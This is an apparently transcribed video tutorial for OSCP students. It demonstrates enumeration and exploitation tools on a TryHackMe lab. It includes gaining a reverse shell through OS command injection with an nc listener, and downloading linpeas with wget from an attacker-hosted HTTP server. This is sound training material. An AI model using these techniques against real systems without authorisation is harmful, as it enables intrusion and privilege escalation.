So, hi everybody, welcome to day one. So, this is the objective. So, we have discussed the foundation concepts in the previous video. Now, we will be learning about information gathering tools. So, here onto my screen, you can see I have listed some important tools like Gobuster, Dirsearch, Nikto, Dirb, Dirbuster, enum for Linux, Nmap, Netcat, Whois Dig, Metasploit framework, Linpiece, Winpiece, GTFOBins, Hashcat, John the Ripper, Hydra. So we shall be discussing about these tools. So the first tool which we have is Gobuster. So this is a directory and DNS brute forcing tool. It's very fast and it's CLI based. So now on to my Kali. So for the practical purpose, we will be seeing the tools onto this lab. It is Pickle from TryHackMe. It's a beginner level, very easy machine. So all the tools like we can just have a quick look here like by practicing this lab. So I am opening my terminal and let me just start the VPN file. So desktop and then sudo open VPN and then sudo.ovpn. Okay, so now I have started my VPN. Now let's start the machine. Okay, so meanwhile this is loading. We are seeing the first tool that is Gobuster. So Gobuster, if it's not installed in your machine, you please just type the tool name, then press enter. Then Kali will be asking you want to install. Just press Y, then enter or the default steps like what the tool is asking you to perform, and then install the tool. So once you will install the tool, you just type Gobuster and then look for help. So here we can see a lot of options which we can use with the tool. We have dir, DNS, fuzz, GCS, help, S3, TFTP, version, vhost. We have a lot of available commands. We have a lot of flags as well which we can use. Okay. So for now we will be using Gobuster and we will be seeing how we can find out the directories with the help of it. So yes. So now this is the IP which we have got. Now let's run this. So Gobuster then we do dir because we want to enumerate directories. Then -u. Then we have to give the URL. Then so Gobuster is not using any inbuilt word list. So you have to give your custom word list. And how we give a custom word list? We have an option that is -w. So just give -w. Now in the Kali Linux we have a word list folder which is located in CD USR share word lists. So you can see we have a lot of folders like AMAS, DNS map, John, Nmap, WFuzz, Wi-Fi.txt and here we have a lot of word list files. Okay. So now once I'll open Dirbuster, we have a lot of files here, like we have a lot of directory word list here. So one is Apache user enumeration 1.0.txt. Then we have directory list 2.3 medium.txt. So for now I am just choosing any random directory list. I'm just copying. Okay, so I have copied the name and now we can start the tool. So let's come back firstly. So, okay, I'll just come here. So, I have copied the word list already. I am giving here. So, here I have actually copied the entire path to my desktop. Then only I am able to access it. Okay, so directly if you do not want to copy it onto desktop, you have to give the complete path. User share word list dirbuster slash directory list 2.3 medium.txt. Okay, so you have to give the entire path. So this is working and it has started giving us the directory. So we are seeing the first directory as assets. Okay. So now I'm just doing Control C. Now let's quickly look at the next tool which I have in my list. Now the next tool is Dirsearch. It is also helpful in directory brute forcing. So Now let's see Dirsearch. So Dirsearch is having its own inbuilt word list. If you want to use that, then you do not have to give any option. But if you don't want to use the inbuilt word list of Dirsearch because it's small in size, then you can give custom word list as well. So I gave Dirsearch -u and then the URL. I'm just doing Control C. This is how the tool works. And then I am just showing you like Dirsearch -h for help. So in this -h we can see a lot of options which we have with the tool. We can use them. So we have -w for wordless, -u for URL. Okay, it's the mandatory option. Then we can give -w for word list. So now let's say I am giving -w and then that directory medium word list I am selecting, and let's go with that. So the same way Dirsearch is working and is searching for the valid directory. So we can see it has looked for assets. So this will take more time. This will be looking for more directories as well. For now I am doing Control C because our main objective is only to understand how the tool is working. Means how to use the tool. Then we have a third tool, that is Nikto. It is for web server vulnerability scanning. It is checking some basic checks. So there are some high level security misconfiguration issues which this tool will be able to tell you. It's entirely CLI based. It's by default installed in Kali Linux. So we can give Nikto -h, then we have to give the host. So this is the host IP. Now let's give the host IP. So by default Nikto works onto port number 80. So Nikto is scanning for the vulnerabilities on port number 80. Okay. So now if you have to give any other port, now let's say the web service is also running onto port 443, or if it's running onto some different port, then you can define that port as well. So -p and then 443. Now since since this web application is not running on 443 and this port is not open here, so that's why we are seeing that it's tested and it's not showing anything. Okay, so this is entirely for web server vulnerability scanning. It's a very basic tool, Nikto. Now the next tool which we have is DIRB. It is also for directory brute forcing. You have to give this is the syntax. You have to give dirb, then the URL, and then the path to word list. So dirb, then we are giving URL. So I have to change my IP, and this is the directory list. So this will take some time, and yeah. So just like previous tools, it will be searching for directory. So I am stopping it. Now let's look onto the next tool, which is Dirbuster. So Dirbuster, we have it already installed in our Kali Linux. It is a graphical based tool. We can see. So this is very helpful. We simply have to give the target URL. I am giving the URL. Then we can increase the number of threads. Then we have to come to browse. Now just come here. So here like onto my desktop I have already saved the file, so I feel I should come to my yeah, so I should come to my desktop directly. So let's come on the desktop and let's see the file and then select it. Now let's start. So now in this interface we have a results option where we can see login PHP, portal PHP, so it's fast also. Here we are seeing the response code or the status code. So with help of status code, we can understand like what is the status of our response, whether whether it's a success, whether it's an error at the server side, or if it's client side error, or if there is any redirection. So we can understand that by seeing the response code. So on to response code, I shall be making another video separately where we will be discussing some of the common response codes which will help you in your interview preparation as well. So we have login PHP, we have portal PHP. Okay. So now I'm just doing stop for now. So we have got portal PHP. All right. And login PHP, there were some more pages as well. Fine. So this is how this tool is working. We have seen the usage. Now let's see the next tool. It is enum for Linux. So this is basically an SMBN NetBIOS enumeration tool for Windows operating system. And how we use it, we have to give the tool name enum for Linux, then hyphen a, and then the target IP. So for now, I'm just simply showing you its help. So enum for Linux and then help. So once we'll come up, we can see like its usage. So this tool is written in Perl programming language. So that's why the extension is .pl for Perl. We have to give dot slash this file options and then the IP. So yeah, so once we shall be solving some more machines, I will be explaining you how we can use this enum for Linux. Okay. Now the next tool we have is Nmap. So Nmap is a very helpful tool and you should know Nmap. It is helpful in information gathering as well as for scanning purpose. With the help of Nmap, we can do port scanning, we can do service scanning, we can understand the version, operating system, we can even do host discovery. We can even we can even use this. We can with the help of this Nmap tool, we can try to evade um, like firewall and antivirus solutions as well. Um, so we have plenty of things which we can do with Nmap. Now there is one more concept in Nmap, that is NSC scripts, that is Nmap scripting engine, which is an advanced concept in Nmap. We shall be discussing about NSC as well. So now let's see some of the common commands for Nmap. So firstly we give Nmap and then this is the IP. So we can see that port, state and the service. So this is the default Nmap scan. Now let's look for the service version. So now we will be seeing like if it's SSH, now what's the version of SSH? If it's HTTP, then what's the version? So we shall be seeing that in detail. So we can see that Apache HTTPD 2.4.41 for this web server, like this is the version of this web service, and then we can see for SSH we have OpenSSH 8.2 P1 Ubuntu. Okay. Now I have one more command to show, that is -o. This is for operating system scan. We can understand like what's the type of OS, whether it's Windows or Linux. So we can see that here it's running Linux 4.x, and to be more precise it's Linux kernel 4.15. Okay. Now let's see, for example, if you want to check whether any particular port is open or not, we just give -p option, then we just give the port number and then we give the IP. So now we can see that that the port state is closed, service is FTP. Now for example, if there is any other service, for example if it's 200, we can just see that the service is SRC and it's closed. Now let's look for some multiple ports, comma 443, comma 66. So we can see that um, these ports states services for all these three port numbers. We can specify the port range as well. So now for example, if I want to scan for all the ports between my range 1 to 200, I can give that. Now we can see one more concept in Nmap. Yeah, that is this NSE part. So NSE is Nmap scripting engine. So I'll just show you NSE Nmap. So this is the official documentation of Nmap. You can refer this as well for your practice part. So Nmap scripting engine is one of the Nmap's most powerful and flexible features. It allows users to write and share simple scripts using Lua programming language. So all the scripts which are there in NSE, they are written in Lua. And we can automate a wide variety of networking tasks with the help of these NSE scripts. In OSCP examination, remember that for enumeration we can use automation, but for exploitation we cannot use automation. Okay, so now let's come here, and for this thing I am just showing you. We have to give script, then we have to just look for, so here I'm just showing you help all. So this command nmap hyphen hyphen script help all will be showing you all the all the available scripts which we have in nmap. So we have smtp ntlm information, smtp open relay. Now here if I'll just scroll down, we have telnet brute, telnet encryption, teamspeak 2 version, targets example. So they all are the scripts which are there in NSE. So now I'm just telling you some of the common scripts which we use very often. This is hyphen hyphen script vuln and then the IP. So this is a script which will automatically be telling you if there are any high level vulnerabilities or not. Okay. Now apart from this we have some scripts like SSH brute, DNS brute. Even those things you should know. Okay, so some of the scripts and how to use them, you should remember it. So now if I'll just show you online, NSE scripts practice. So there are some of the common scripts which you should know. Yes. um okay, so there are a lot of resources online. So we have this Medium page by Koe Yong, this research article where they have already explained these, like some of the common NSE scripts. Okay, like we have http enum.nse. Then here we are having some more scripts like grep.nse. So you please practice at least some of the NSE scripts. Okay. Fine. So now we can look at the next tool, which is Netcat. So this Netcat is it's a tool which will be acting like, which will be helping us in listening to the connection. Let's say if we have uploaded reverse shell code, like if we have uploaded the reverse shell payload onto any uh, site, now we are using Netcat to listen the connection. So whatsoever connection is getting established, that thing we are able to hear onto our local machine with the help of Netcat. We can even interact with that machine where we have added the reverse shell payload. So it's used for banner grabbing as well, and for reverse shell listening as well. Okay. So now for the practical purpose, I'm just showing you. So here, this is the machine. So this was the IP. I am giving the IP. Okay. So, all right. Now Now let's view the page source code. So we have got the username. It's Rick Rules 3. So now let's keep it for a reference, the username. We even got some more pages. We even got a folder like assets. I'll just look at it, and then we can just view the page source. Okay, so we have nothing here. All right. So we will not be wasting much time onto enumerating and onto solving this very basic lab. So I'm just going online, and I'm just looking for the password for this machine, because mainly we are focusing on to this Netcat tool. Okay. So pickle rig walkthrough, we can just go with this. Now let's come down, because we are not solely seeing the enumeration and how to solve this machine. Okay, so we shall be solving a machine, but this is here we are only seeing the tools. So this is the password which we have got. So I am just giving here. Okay. So on to portal.php page which we have got. This is the password, and for the username, this is the username. Let's give it and then login. So this is the command panel which we have got. So now here if I am just writing, okay, now let me just write ls. So we can see the system related file. So this means that it is vulnerable to OS command injection, which is operating system command injection. Like whatsoever thing, if we are injecting the operating system related payload and the site is executing that and is giving the result, then this means it's vulnerable to OS command injection flaw. So we shall be having a dedicated module onto common vulnerabilities as well. Okay. So here now I am just coming on to my hack tools, and then this is the reverse shell payload. I am just, so firstly I have to just change my IP. So I'll just see my IP now. Okay. So I'll just look at my IP. So my IP is 192.168.45.248. Okay. So now this is the IP, and let's come up here. I am coming onto my hack tools, and then this is the IP. Now let's copy. I'm just giving it here. Onto my terminal, I'm doing nc -lnvp and then 9999. So we can start listener anywhere. Now I'm just doing execute. Okay. So here, okay, so we have not got the shell. Let me see, just a second. Uh, so this is my lab's IP. So there is some problem with the IP address. Yes, so because my offset proof grounds VPN is also running, I guess. So this is the IP which we have to give. Okay. So yeah, this is for tunnel 0, tunnel 1. Like so, like here in my PC, multiple VPN files are running. Like that's why. So let's come on to this hack tools, and I am giving this. Yeah. So now let's copy this, and I'm just pasting it here and then do execute. Okay. So it's 10.20194.125. So 10.9.3.159. So this IP is correct, which I gave, but I'll just give it again. Yeah. So this reversal code I am giving here, and then let me execute. Perfect. So now you can see that we have got the shell. Okay, if I am doing ls, so I can see that we are able to come inside the system. So we have got the initial foothold. So this is how we use this nc tool. This nc tool, like if you want to understand like what's this lnvp, then I'm just showing you. You look at this help. Okay. So sorry, nc-h. So now in this help option, we can see plenty of options here. We can give nc options, hostname, ports. So we have -c for shell commands. We have -l for listening mode. We have -p for port. We have -n for numeric only IP address, no DNS. So we have a lot of options here. Okay. All right. So now we can just move on to the next tool, that is Whois. So this Whois is an information gathering tool which will be telling you the basic registrar information about any domain. So now if I'm just doing Whois, let's say bitcovers.com, then I'm able to see the basic registrar information. Okay. So now let's come on to the next tool. This is Dig. So Dig is a tool which is used for DNS troubleshooting as well as for its enumeration. So for this thing, we just have to give Dig, and then we can just give any domain name. So this is how we use it. Okay. Now the next tool which I have in my list is Rust Scan. So Rust Scan is also like Nmap, but it's more fast than Nmap. Because Nmap will be like, so like Nmap will give you all the result together, right? But Rust Scan, and like let's say if it has discovered port 80, port 443, or any other port, so this will keep on giving the result. Okay. So now let's say if it's half completed, so this will give you the result of half execution command, and then the rest of the things will keep on getting loaded. So this is a bit fast, okay, as compared to Nmap. Moreover, yeah. So now the next tool which we have is Metasploit framework. So this Metasploit framework is a very popular exploitation framework. Um, Metasploit framework we can use in all the phases of pentest process, be it your information gathering, be it scanning, be it exploitation part. So through Metasploit framework, we can look for the exploits, but we do not have to run and execute the exploits directly with the help of this framework. Okay, so we have a lot of modules in MSF framework like MSF console, MSF Venom, Metapreter. So MSF console is that interface through which we are interacting with the Metasploit framework. Through MSF Venom, we can create our own custom payloads, and yeah. So through Metapreter, like we are able to get the shell. So now how to access this? We have to simply type MSF console. So later on we shall be solving some simple machines as well, where I will be explaining you this tool too. But in OSCP examination, remember as we discussed previously too, that you can use automated tools for information gathering, but you should not use them for exploitation. So Metasploit framework is having a very limited access in your OSCP examination. Okay, so yeah. So this is how like it looks like. We have a lot of options here. We have a lot of modules. So you can just see here some of the components of Metasploit framework. So we have 2519 exploits, 1296 auxiliary commands, 431. We have hmm, yeah, we have like post. It's also one of the components. We have 1610 payloads, 49 encoders, 13 knobs, and 9 evasion related commands and scripts. Okay. All right. So I'm just typing exit and let's come out of it. So now the next tool which we have to know is, yes, the manual methods of exploitation. So see, sometimes exploit code will be in Python, so you have to run it like you have to just run by typing the tool, like the version of the Python, let's say Python 3 exploit.py and then the IP. Now let's say if it's in bash, you have to give bash and then shellname.sh whatsoever is the exploit. And you can do one more thing. Let's say if you're not able to understand anything, you can just make it executable chmod plus x and the file name, and then just run it with dot slash. Okay, so even that thing will work. So we will be using like many type of exploits. Some might be written in PHP, some might be written in Ruby, some might be in C. So we will be understanding, like as we'll keep on solving labs, you will be understanding like how to do it and what's the approach. Now we have linpiece. So linpiece is a Linux privilege escalation enumeration script. Linpiece you have to use only when you are getting the, like once you have got the initial foothold, then you can use linpiece to basically enumerate it more. Okay, let's say you have like you are some guest user now in the system. You have got the access. You are some guest user. Now you want to become root user, but you are not able to understand anything. So there are so many components. There are so many files. There are so many configuration settings. So many binaries which we have to check. So we need to know manual methods as well, like how we are doing enumeration to escalate the privilege. And the second thing which you should know is the use of linpiece. So linpiece will automatically be enumerating and will be telling you a lot of information. But how to analyze, how to interpret the information, for that thing you need to be clear with the manual methods. So now how to use the linpiece and how to send the linpiece in your lab environment, that thing we will be seeing. So here now if I am just going back, so I want to go to my home. Okay, now I'm going to desktop. So here I have my linpiece.sh script. So firstly we have to start the HTTP server. So Python 3 and then -m http dot server. I'm giving the number, let's say 7878. We can give any port number. Now let's come up here. So generally we will be going inside the tmp folder and then do wget http your IP, that's 10.9.3.159 and then colon 7878 and then linpiece.sh. So this is correct. I'll just review my port as well. Yeah, it's fine. So now let's do enter. Perfect. So we have linpiece in our lab environment. So now like if I'll just show you ls-l, so this is not having the permission to execute. So we have to give it chmod plus x and then linpiece.sh. So now if I just show you the permission, it is having executable permission. Then we run like this dot slash linpiece.sh. You can run it by typing bash linpiece.sh2 or dot slash linpiece by .sh. So I have given wrong spelling. Yeah. So now this is working and this will be giving you a lot of information. So you have to wait for it. So for now, I'm just stopping it because we have to see the next tool as well. Okay. Now the next script which we have is WinPiece. WinPiece is for Windows Previous Escalation. So like this, we will be understanding in detail. Like once we will be solving some Windows machine. Okay. So this is also like this will also work in the same way, but this will be giving you a lot of information, misconfiguration settings about the windows, and which will help you a lot in understanding like what things you can exploit and how you can come and become the root. So we have one more tool, that is GTFOBin. So this is a catalog where we have a lot of techniques like how to use certain binary for privilege escalation. So this GTFOBin binary, you can just look for it, GTFOBins, and we can see that it's having the list of Unix binaries that can be used to bypass the local security restrictions in the misconfigured system. So we have a lot of binaries here, we can use it. Okay. Now the next tools which I have is SOCAT. So this is for advanced tunneling and for port forwarding. We shall be understanding this in detail once we will be solving some lab which will be using this concept. Okay. So yes. So we have a lot of tools by which we can create our reverse shell payload as well. So see, so we have one tool that is reverse shell generator. Yeah, so this is reverse shell generator. Here you simply have to give your IP, you have to give your port number, and then according to the lab requirements, we can just select the reverse shell code and then let's see if it's working or not. Apart from this, we have one very popular reverse shell by Pentest Monkey. Okay, so part so this you can just come here. So we have the entire cheat sheet for this as well. We have the PHP based shell, Netcat based shell, Java based shell. So we have so many type of shells here. Now, apart from this, we have this extension which is hack tools. We have a lot of options here as well. Okay. Now let's come here and let's see. Yeah. So onto this burp suite, I shall be making an entire video because it's a big tool and burp suite is very helpful for searching a lot of vulnerabilities which are basically affecting web interface. Okay, so we can use burp for mobile pt as well, but mainly we shall be focusing this burp for our web application pen testing. So we shall be understanding burp in detail. I will be making an entire video dedicated to burp suite. Yeah, so for hydra I already have a very detailed video onto my youtube channel. For john the ripper 2 and for hashcat too. Okay, so all right, so we have discussed some of the common tools and now we shall be learning about like some basic practice labs, like what things you should practice, and we shall also be starting with one lab today. Okay, so thank you everybody, see you in the next video.